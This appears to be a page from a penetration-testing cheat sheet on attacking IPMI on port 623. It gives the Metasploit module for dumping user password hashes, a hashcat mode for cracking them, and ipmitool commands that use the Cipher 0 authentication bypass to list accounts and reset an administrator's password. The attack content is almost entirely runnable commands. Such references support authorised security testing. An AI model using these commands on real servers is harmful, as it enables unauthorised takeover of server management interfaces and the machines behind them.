• Port: 623
  • Protocol: udp/tcp

Table of content

Dump hash

A flaw in the IPMI implementation allows the retrieval of users hashes

use auxiliary/scanner/ipmi/ipmi_dumphashes

# Nmap

The hashes can be cracked using hashcat or john

hashcat -m 7300

Cipher 0

IPMI2.0 is vulnerable to an authentication bypass when the Cipher 0 option is used. However, a valid username is needed for the exploitation.

apt-get install ipmitool
ipmitool -I lanplus -C 0 -H ${ip} -U ${user} -P ${randomString} user list

# ID  Name      Callin  Link Auth   IPMI Msg   Channel Priv Limit
# 2   root             true    true       true       ADMINISTRATOR
# 3   Oper1            true    true       true       ADMINISTRATOR

Set password

# Using Cipher0 vulnerability
ipmitool -I lanplus -C 0 -H ${ip} -U ${user} -P ${randomString} user set password ${userId} abc123

# Otherwise
ipmitool -I lanplus -H ${ip} -U ${user} -P ${randomString} user set password ${userId} abc123

The ${userId} is the one retrieved with the user list command.


results matching ""

    No results matching ""

    results matching ""

      No results matching ""